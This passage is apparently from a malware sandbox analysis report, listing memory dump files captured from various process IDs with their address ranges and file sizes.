        • memory/552-244-0x0000000000400000-0x0000000000412000-memory.dmp
          Filesize

          72KB

        • memory/552-240-0x0000000000400000-0x0000000000412000-memory.dmp
          Filesize

          72KB

        • memory/860-312-0x0000000000000000-mapping.dmp
        • memory/1304-246-0x0000000000000000-mapping.dmp
        • memory/1304-249-0x000000006FA10000-0x000000006FA5C000-memory.dmp
          Filesize

          304KB

        • memory/1308-234-0x0000000000620000-0x000000000062A000-memory.dmp
          Filesize

          40KB

        • memory/1308-229-0x0000000000000000-mapping.dmp
        • memory/1312-172-0x0000000000400000-0x0000000000412000-memory.dmp
          Filesize

          72KB

        • memory/1312-177-0x0000000000400000-0x0000000000412000-memory.dmp
          Filesize

          72KB

        • memory/1312-169-0x0000000000000000-mapping.dmp
        • memory/1332-167-0x0000000000400000-0x0000000000405000-memory.dmp
          Filesize

          20KB

        • memory/1332-143-0x0000000000400000-0x0000000000405000-memory.dmp
          Filesize

          20KB

        • memory/1332-138-0x0000000000000000-mapping.dmp
        • memory/1500-230-0x0000000000000000-mapping.dmp
        • memory/1604-154-0x0000000000000000-mapping.dmp
        • memory/1932-173-0x0000000000000000-mapping.dmp
        • memory/1932-179-0x0000000060900000-0x0000000060992000-memory.dmp
          Filesize

          584KB

        • memory/1932-212-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

        • memory/1932-176-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

        • memory/2288-258-0x0000000000000000-mapping.dmp
        • memory/2292-164-0x0000000000000000-mapping.dmp
        • memory/2292-187-0x0000000005640000-0x000000000565E000-memory.dmp
          Filesize

          120KB

        • memory/2292-178-0x0000000005480000-0x0000000005532000-memory.dmp
          Filesize

          712KB

        • memory/2292-201-0x00000000058C0000-0x0000000005952000-memory.dmp
          Filesize

          584KB

        • memory/2644-213-0x0000000000000000-mapping.dmp
        • memory/3024-130-0x0000020014330000-0x0000020014352000-memory.dmp
          Filesize

          136KB

        • memory/3024-135-0x00007FFD42800000-0x00007FFD432C1000-memory.dmp
          Filesize

          10.8MB

        • memory/3024-131-0x00007FFD42800000-0x00007FFD432C1000-memory.dmp
          Filesize

          10.8MB

        • memory/3452-221-0x0000000073610000-0x000000007365C000-memory.dmp
          Filesize

          304KB

        • memory/3452-210-0x0000000000000000-mapping.dmp
        • memory/3488-251-0x0000000000000000-mapping.dmp
        • memory/3488-252-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

        • memory/3488-255-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

        • memory/3488-256-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

        • memory/3488-289-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

        • memory/3556-171-0x00000000034D0000-0x00000000034D8000-memory.dmp
          Filesize

          32KB

        • memory/3556-144-0x0000000000000000-mapping.dmp
        • memory/3584-290-0x0000000000000000-mapping.dmp
        • memory/3696-163-0x0000000005340000-0x00000000053B6000-memory.dmp
          Filesize

          472KB

        • memory/3696-168-0x0000000005750000-0x00000000057A0000-memory.dmp
          Filesize

          320KB

        • memory/3696-159-0x0000000000000000-mapping.dmp
        • memory/3696-162-0x0000000000A20000-0x0000000000AE6000-memory.dmp
          Filesize

          792KB

        • memory/3748-175-0x0000000000710000-0x0000000000716000-memory.dmp
          Filesize

          24KB

        • memory/3748-149-0x0000000000000000-mapping.dmp
        • memory/3800-288-0x0000000000000000-mapping.dmp
        • memory/3972-132-0x0000000000000000-mapping.dmp
        • memory/3972-142-0x0000000002260000-0x0000000002265000-memory.dmp
          Filesize

          20KB

        • memory/4184-211-0x0000000000000000-mapping.dmp
        • memory/4196-219-0x00000000073C0000-0x00000000073CA000-memory.dmp
          Filesize

          40KB

        • memory/4196-215-0x0000000006540000-0x000000000655A000-memory.dmp
          Filesize

          104KB

        • memory/4196-206-0x0000000005980000-0x00000000059E6000-memory.dmp
          Filesize

          408KB

        • memory/4196-222-0x0000000007570000-0x000000000757E000-memory.dmp
          Filesize

          56KB

        • memory/4196-220-0x00000000075D0000-0x0000000007666000-memory.dmp
          Filesize

          600KB

        • memory/4196-223-0x0000000007D20000-0x0000000007D3A000-memory.dmp
          Filesize

          104KB

        • memory/4196-202-0x0000000000000000-mapping.dmp
        • memory/4196-218-0x0000000007060000-0x000000000707E000-memory.dmp
          Filesize

          120KB

        • memory/4196-217-0x0000000073610000-0x000000007365C000-memory.dmp
          Filesize

          304KB

        • memory/4196-216-0x0000000007080000-0x00000000070B2000-memory.dmp
          Filesize

          200KB

        • memory/4196-203-0x0000000004AC0000-0x0000000004AF6000-memory.dmp
          Filesize

          216KB

        • memory/4196-209-0x0000000006050000-0x000000000606E000-memory.dmp
          Filesize

          120KB

        • memory/4196-224-0x0000000007670000-0x0000000007678000-memory.dmp
          Filesize

          32KB

        • memory/4196-204-0x0000000005130000-0x0000000005758000-memory.dmp
          Filesize

          6.2MB

        • memory/4196-205-0x00000000050A0000-0x00000000050C2000-memory.dmp
          Filesize

          136KB

        • memory/4196-207-0x00000000059F0000-0x0000000005A56000-memory.dmp
          Filesize

          408KB

        • memory/4196-214-0x0000000007680000-0x0000000007CFA000-memory.dmp
          Filesize

          6.5MB

        • memory/4336-266-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

        • memory/4336-260-0x0000000000000000-mapping.dmp
        • memory/4336-313-0x0000000000400000-0x000000000043D000-memory.dmp
          Filesize

          244KB

        • memory/4472-314-0x0000000000000000-mapping.dmp
        • memory/4752-247-0x0000000000000000-mapping.dmp
        • memory/4752-250-0x000000006FA10000-0x000000006FA5C000-memory.dmp
          Filesize

          304KB

        • memory/5056-235-0x0000000000000000-mapping.dmp
        • memory/5056-245-0x0000000000400000-0x0000000000412000-memory.dmp
          Filesize

          72KB